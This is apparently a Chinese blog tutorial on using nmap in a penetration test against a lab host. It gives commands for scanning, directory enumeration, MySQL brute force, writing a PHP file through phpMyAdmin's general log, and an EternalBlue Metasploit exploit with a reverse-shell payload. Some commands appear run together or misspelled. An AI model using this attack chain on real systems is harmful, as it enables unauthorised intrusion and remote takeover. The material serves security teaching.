nmap在滲透測試中的運用

2020-12-24 kali博客

nmap在滲透測試中的應用

Nmap這個神器在滲透測試中是必不可少的。從信息收集到拿shell。有時候還真少不了它!本文將要介紹nmap在滲透測試中,都有那些運用和攻擊手段。

nmap一:利用nmap對目標進行信息收集

命令如下:

nmap-T4-A 192.168.123.239

對目標主機掃描結果從上圖我們發現,目標是一臺windows系統,並且開啟了常見的804453306等常見的埠。

二:對目標站點進行掃描

命令如下:

dirb http://192.168.123.239

通過對目標站點分析,我們發現了一些敏感的文件目錄。phpMyAdmininclude等等。在第一步中,我們掃描到了3306埠,這也意味著目標可以遠程登錄資料庫。

三:利用nmap暴力破解mysql

命令如下:

nmap -p 3306 --script=mysql-brute.nse 192.168.123.239

如上,通過暴力破解,我們得到了帳號和密碼為root和123456

四:嘗試遠程登錄

命令如下:

mysql-h 192.168.123.239-uroot-p成功登錄資料庫

利用phpMyAdmin拿shell

在前期的文章中提到過,我們先登錄到phpMyAdin

執行下面的sql語句

SETGLOBAL GENERAL_log='on';SETGLOBAL GENERAL_log_file='D:/phpstudy_pro/WWW/cmd.php';SELECT'<?php phpinfo(); ?>';需要注意的是,一定要寫對目標的站點根目錄的絕對地址執行完成後,會在更目錄生成一個cmd.php文件,我們訪問效果如下:

利用此種方式,便可成功拿shell。

五:利用nmap掃描目標主機漏洞

命令如下:

nmap -v --script=smb-vuln-*.nse --script-args=unsafe=1 ip -Pn掃描結果如下:

可以看到,目標存在ms17-010ms10-054CVE-2017-0143等漏洞。

六:配合msfconsole拿下系統權限

命令如下:

use exploit/windows/smb/ms17_010_eternalblueset RHOSTS 192.168.123.66set payload windows/x64/meterpreter/reverse_tcpexploti

通過上訴示例,我們利用nmap從簡單的信息收集到拿shell。一次完整的滲透測試就完成了。

相關焦點

  • 伺服器安全之滲透測試服務
    伺服器信息收集在滲透攻擊過程中,對目標伺服器的信息收集是非常重要的一步,伺服器上面可以運行大量的系統服務和第三方應用服務,如果作業系統或者第三方教件沒有及時升級打補丁,攻擊者就有可能直接通過伺服器上運行的服務進行攻擊,因為伺服器的錯誤配置或者不安全的訪問控制,導致通過伺服器漏洞進行攻擊的案例墨見不鮮,如果資料庫可以直接對外連接並且存在資料庫弱口令
  • 網絡安全與Kali Linux:Nmap探測目標主機埠狀態
    通常我們在進行滲透測試的過程中需要對目標主機的埠開放狀態進行探測,從而了解目標主機,進行對應的測試。二、資源裝備安裝好Kali Linux的虛擬機一臺;整裝待發的小白一個。三、戰略安排3.1 nmap基本語法使用查看,如下圖所示。
  • 網絡安全與Kali Linux:Nmap網絡掃描高級使用技巧
    (這裡牽扯到TCP報文結構的問題,在TCP報文中SYN標誌位用來建立連接,讓連接的雙方同步序列號.如果SYN=1而ACK=0,則表示該數據包為連接請求,如果SYN=1且ACK=1,則表示接受連接.)(2):如果目標主機的回應報文中SYN=1,ACK=1,則說明該埠是活動的,那麼接著,我們再發一個RST給目標主機,拒絕建立連接.
  • Nmap常用命令之埠掃描
    在前面的教程中我們介紹了Nmap的基礎操作,使用Nmap我們可以對單一目標進行掃描,也可以對多個連續的目標或者多個不連續的目標進行掃描。當然Nmap的功能遠不止於此,本節教程我們將繼續介紹部分Nmap常用的命令。
  • 網絡安全與Kali Linux:Nmap腳本引擎使用實戰教程
    正如大多數被用於網絡安全的工具,nmap 也是不少黑客及駭客(又稱腳本小子)愛用的工具 。系統管理員可以利用nmap來探測工作環境中未經批准使用的伺服器,但是黑客會利用nmap來搜集目標電腦的網絡設定,從而計劃攻擊的方法。
  • 十大黑客工具之nmap
    而在這四項功能的基礎上,nmap還提供防火牆和 IDS 的規避技巧,可以綜合運用到四個基本功能的各個階段。另外nmap還提供強大的NSE(Nmap Scripting Language)腳本引擎功能,腳本可以對基本功能進行補充和擴展。
  • 滲透測試之嗅探流量抓包掃描精華
    在浩瀚的網絡中安全問題是最普遍的需求,很多想要對網站進行滲透測試服務的,來想要保障網站的安全性防止被入侵被攻擊等問題,在此我們Sine安全整理了下在滲透安全測試中抓包分析以及嗅探主機服務類型,以及埠掃描等識別應用服務,來綜合評估網站安全。8.2.1.
  • Nmap掃描結果說明與作用
    一次簡單的防火牆審計掃描操作大致是這樣的:  nmap -v -sA -ff -r -n www.yourorg.com -oA firewallaudit  上述指令的含義是,Nmap TCP ACK掃描(-sA)證實數據包是否可以不經過過濾通過你的防火牆。通過增加-ff選項,你還可以測試它如何處理分段的通訊。
  • Linux網絡安全——網絡安全工具 nmap
    第三章:Linux網絡安全3.1 網絡安全工具 nmap3.1.1 nmap簡介nmap是一個網絡探測和安全掃描程序,可以通過nmap掃描網絡nmap使用一些技術檢測主機作業系統網絡協議相關特徵,以此來推斷目標主機作業系統的類型;-v: 冗餘模式。它會給出掃描過程中的詳細信息。
  • 滲透測試:數十款重要工具介紹
    E安全5月3日訊 滲透測試工具是被用來測試網絡和應用漏洞。下面E安全介紹多個綜合型網絡滲透測試工具,涵蓋所有環境下的滲透測試操作:   掃描/滲透測試
  • 一分鐘完成Kali linux 滲透測試系統搭建-就是這麼肉
    Kali Linux預裝了許多滲透測試軟體,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.用戶可通過硬碟、live CD或live USB運行Kali Linux。Kali Linux既有32位和64位的鏡像。可用於x86 指令集。
  • 如何找出Linux中所有在線主機IP位址?Nmap可助你一臂之力
    你可以在Linux的生態系統中找到很多網絡監控工具,它們可以為你生成出網絡中所有設備的摘要,包括它們的IP位址等信息。然而,實際上有時候你只需要一個簡單的命令行工具,運行一個簡單的命令就能提供同樣的信息。
  • 滲透測試靶機提權實驗
    #-p 遠程的目標埠# 意思是把目標的6379埠轉發到本地999埠,999是你自己的伺服器埠,這樣你就可以隨便操作了複製代碼接下來使用nmap探測redis是否存在漏洞nmap -A -p 999 -script redis-info 127.0.0.1複製代碼因為我們已經做了埠轉發,所以這個999,實際是目標站的6379埠,127.0.0.1實際上是目標的
  • 如何寫一遍完整的滲透測試報告 模板教學篇
    說白了,就是說在網站滲透測試的最後一個步驟裡,對代碼的漏洞要統計、檢測結果顯示並現場演示一些早已辨別、認證和運用了的安全漏洞。被測公司的管理和技術精英團隊會檢驗滲透時採取的方式,並會根據這些文檔中的結果顯示,來修補所存有的網站漏洞。因此從社會道德視角來講,安全檢測結果顯示的工作目標非常至關重要。
  • 黑客專用軟體之Nmap掃描工具-神器
    Nmapnmap是一個網絡連接端掃描軟體,它用於掃描網際網路計算機的網絡連接端。確定哪些服務正在運行哪些連接,推導出計算機運行的作業系統(也稱指紋識別)。首先,我們舉一個例子來掃描區域網中的主機,使用最簡單的ping掃描。
  • 13個有用的滲透測試資源博客
    滲透測試可以檢測如下內容:系統對攻擊的反應,存在哪些會被攻擊的脆弱點,如果有,系統中哪些數據會被竊取。關於滲透測試不要將滲透測試等同於簡單的漏洞掃描或者安全審計,它還要除此之外的工作。滲透測試有助於尋找非常複雜的攻擊向量,找到在開發階段沒能檢測出來的漏洞。在遭到入侵之後,也常使用滲透測試,檢測攻擊者的攻擊方法,還原出攻擊方法,並阻止與此相同的攻擊。
  • 網站滲透測試報告速寫模板指南
    網站滲透測試服務在給客戶寫報告模板或者檢查表的時候,應逐步完善。寫報告在滲透測試中耗費大量的時間和精力。花費的時間取決於客戶和經理期望的交付成果。(中文大概意思是客戶和老闆能不能看懂你的報告)獎勵項目報告通常比滲透測試報告短,但是無論什麼格式,您都將受益於為每個文檔和測試類型創建模板(黑盒、白盒、Web、網絡、wifi)。理想情況下,您的滲透測試模板應包括:通常測試的測試列表。有時候客戶會問這個,提前做好準備。
  • 應對攻擊的分階段滲透測試完全手冊
    因此,為了及時發現應用程式中存在的漏洞,以及縮小易受攻擊面,我們需要通過模擬黑客、及其行為,來開展頻繁且徹底的滲透測試,發現目標IT環境中的潛在安全漏洞,進而予以整改。滲透測試的目標總體而言,滲透測試(或稱Pen testing)是為了發現風險和漏洞,通過深入檢測與挖掘目標在任何合法攻擊形式下,可能受到的危害程度。
  • web安全-信息探測-史上最詳細NMAP講解(2/3)(連載)
    名稱nmap-網絡探索工具和安全性/埠掃描程序概要nmap [掃描類型...] [選項] {目標規格}Nmap 7.70SVN(https://nmap.org)用法:nmap [掃描類型] [選項] {目標規範}目標規格:可以傳遞主機名,IP位址,網絡等。
  • Windows滲透測試工具CommandoVM安裝使用教程
    2019年3月28日,火眼發布了一個包含超過140個開源Windows滲透工具包含140個滲透工具,紅隊滲透測試員和藍隊防禦人員均擁有了頂級偵察與漏洞利用程序集。該工具集名為「CommandoVM」.火眼旗下麥迪安網絡安全公司顧問以及Commando VM套件的聯合創建者 Jake Barteaux 表示:在進行內部滲透測試時,我身邊的大部分滲透測試工程師都會先自行配置一個Windows測試環境。能不能把這個環境配置好,配得有多快,已然成為了衡量滲透測試工程師手藝高低的標準了。